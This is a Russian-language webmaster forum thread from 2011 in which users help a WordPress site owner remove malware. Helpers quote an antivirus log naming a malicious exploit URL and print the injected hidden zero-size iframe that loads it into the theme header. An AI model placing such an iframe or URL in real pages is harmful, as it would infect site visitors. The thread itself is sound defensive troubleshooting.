Помощник
 |
|
|
|
|
Сообщение сайта
|
 С сайта поперли вирусы, помогите избавиться |
kismedia
|
 9.2.2011, 14:14;
Ответить: kismedia
Сообщение
#22
|
|
Бывалый  Группа: User Сообщений: 330 Регистрация: 11.11.2010 Из: Нижний Новгород Поблагодарили: 1 раз Репутация:  0 
 |
Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено. Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия. |
 |
|
softgaz
|
Сообщение
#23
|
|
Новичок Группа: User Сообщений: 14 Регистрация: 8.2.2011 Поблагодарили: 0 раз Репутация: 0
|
(Kismedia @ 9.2.2011, 13:14)  Нет, базу пока не надо, давайте с файлами разберемся. Много плагинов сейчас подключено. Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия. Естественно, это понятно: реальные скрипты (Kismedia @ 9.2.2011, 13:14) Нет, базу пока не надо, давайте с файлами разберемся. Много плагинов сейчас подключено. Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия. Отправил - заранее огромнейшее спасибо!!! |
|
|
|
|
kismedia
|
9.2.2011, 16:53;
Ответить: kismedia
Сообщение
#24
|
|
Бывалый Группа: User Сообщений: 330 Регистрация: 11.11.2010 Из: Нижний Новгород Поблагодарили: 1 раз Репутация: 0
|
softgaz, проверил все на наличие распространенных видов, способов подгрузки стороннего кода.
Так же прогнал сайт через несколько сервисов и программ. Ничего подозрительного не нашел. На данный момент у меня антивирус не ругается на Ваш сайт. У Вас есть сейчас сообщения о вирусе, блокировка сайта? |
|
|
|
|
kismedia
|
9.2.2011, 23:01;
Ответить: kismedia
Сообщение
#25
|
|
Бывалый Группа: User Сообщений: 330 Регистрация: 11.11.2010 Из: Нижний Новгород Поблагодарили: 1 раз Репутация: 0
|
softgaz, вчера ,когда Вы начали данную тему у Вас действительно на сайте был вирус.
На данный момент мой антивирус не выдает уже сообщений о вирусе. Возможно, Вы сами еще с утра в результате замены ,обновлении текущей темы удалили его. Либо произвели еще какие-либо действия. Пишите еще раз в Яндекс, 90% что вируса на данный момент нет. 
|
|
|
|
|
sc2r2bey
|
9.2.2011, 23:04;
Ответить: sc2r2bey
Сообщение
#26
|
 Топовый постер Группа: User Сообщений: 2596 Регистрация: 22.8.2010 Поблагодарили: 10 раз Репутация: 73
|
есть вирус
ты хостеру писал?
-------------------- |
|
|
|
|
kismedia
|
9.2.2011, 23:09;
Ответить: kismedia
Сообщение
#27
|
|
Бывалый Группа: User Сообщений: 330 Регистрация: 11.11.2010 Из: Нижний Новгород Поблагодарили: 1 раз Репутация: 0
|
(surfer @ 9.2.2011, 22:04) есть вирус ты хостеру писал?Да, действительно, сейчас повторно зашел и началось |
|
|
|
|
kismedia
|
9.2.2011, 23:15;
Ответить: kismedia
Сообщение
#28
|
|
Бывалый Группа: User Сообщений: 330 Регистрация: 11.11.2010 Из: Нижний Новгород Поблагодарили: 1 раз Репутация: 0
|
Вот собственно лог журнала:
09.02.2011 22:12:46 Фильтр HTTP файл http://ladygaga.ipq.co/games/pdf2.php?f=23 JS/Exploit.Pdfka.OQD троянская программа соединение прервано - изолирован KISMEDIA\Юрий Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Opera\opera.exe. |
|
|
|
|
sc2r2bey
|
9.2.2011, 23:24;
Ответить: sc2r2bey
Сообщение
#29
|
|
Топовый постер Группа: User Сообщений: 2596 Регистрация: 22.8.2010 Поблагодарили: 10 раз Репутация: 73
|
он самый, может через сервак бьют, писал хостеру?
ну есчо через скрипт могут, надо проверить версию ВП, плагины какие стоят свою машину проверял? -------------------- |
|
|
|
|
kismedia
|
10.2.2011, 0:13;
Ответить: kismedia
Сообщение
#30
|
|
Бывалый Группа: User Сообщений: 330 Регистрация: 11.11.2010 Из: Нижний Новгород Поблагодарили: 1 раз Репутация: 0
|
Нашел я твой код в исходнике страницы:
<!-- RSS --> <div id="header-rss"><a href="http://www.softgaz.ru/?feed=rss2">Подписка на RSS</a></div> <div id="header-comments"><iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><a href="http://www.softgaz.ru/?feed=comments-rss2">Комментарии RSS</a></div> <!-- Categories --> Реально Фрэйм пропустил, пропарил, да и хорошо он вообще замаскирован, вклинился прямо в часть кода, не где-то там сбоку. Правда, архив твоей темы у меня на работе остался, а со своего сервера ты уже его удалил. Можешь сам его найти и убрать. Убрать нужно это: <iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe> Возможно в файле header.php P.S. Понял почему я его не нашел, по-ходу все-таки подгружается он у тебя динамически в шаблон. То он есть, то его нет. Завтра просканирую еще раз весь твой архив. surfer правильно говорит: он самый, может через сервак бьют, писал хостеру? ну есчо через скрипт могут, надо проверить версию ВП, плагины какие стоят свою машину проверял? Если такая хрень хитрая, прячится еще постоянно, все нужно проверять. Хостеру напиши! |
|
|
|
|
softgaz
|
Сообщение
#31
|
|
Новичок Группа: User Сообщений: 14 Регистрация: 8.2.2011 Поблагодарили: 0 раз Репутация: 0
|
(Kismedia @ 9.2.2011, 23:13) Нашел я твой код в исходнике страницы: <!-- RSS --> <div id="header-rss"><a href="http://www.softgaz.ru/?feed=rss2">Подписка на RSS</a></div> <div id="header-comments"><iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><a href="http://www.softgaz.ru/?feed=comments-rss2">Комментарии RSS</a></div> <!-- Categories --> Реально Фрэйм пропустил, пропарил, да и хорошо он вообще замаскирован, вклинился прямо в часть кода, не где-то там сбоку. Правда, архив твоей темы у меня на работе остался, а со своего сервера ты уже его удалил. Можешь сам его найти и убрать. Убрать нужно это: <iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe> Возможно в файле header.php P.S. Понял почему я его не нашел, по-ходу все-таки подгружается он у тебя динамически в шаблон. То он есть, то его нет. Завтра просканирую еще раз весь твой архив. surfer правильно говорит: Если такая хрень хитрая, прячится еще постоянно, все нужно проверять. Хостеру напиши! Мужики, просто не знаю, как вас благодарить! Но кода вируса в РНР я не нашел! Поэтому просто убрал эту строчку в header.php Но по всему получается, что этот вирус сидит в базе... |
|
|
|
|
|
Похожие темы
| Тема | Ответов | Автор | Просмотров | Последний ответ | |
|---|---|---|---|---|---|
 |
Какой % отказов нормален для сайта? | 11 | Aloof | 2794 | 16.4.2024, 12:48 автор: diviner99 |
 |
 Быстрая индексация страниц сайта и обратных ссылок - 2Index |
37 | 2Index | 6585 | 15.4.2024, 16:17 автор: 2Index |
|
SiteAnalyzer - бесплатная программа для аудита и анализа сайта |
77 | Chaser | 74202 | 9.4.2024, 11:36 автор: Chaser |
|
Нужен кодер, чтобы пофиксить ошибку Wordpress после переноса сайта | 0 | Alex-777 | 810 | 7.4.2024, 18:05 автор: Alex-777 |
|
Продвижение молодого сайта | 30 | maxmer | 6569 | 26.3.2024, 21:49 автор: c4p1t4l15t |
|
Текстовая версия | Сейчас: 18.4.2024, 6:55 |
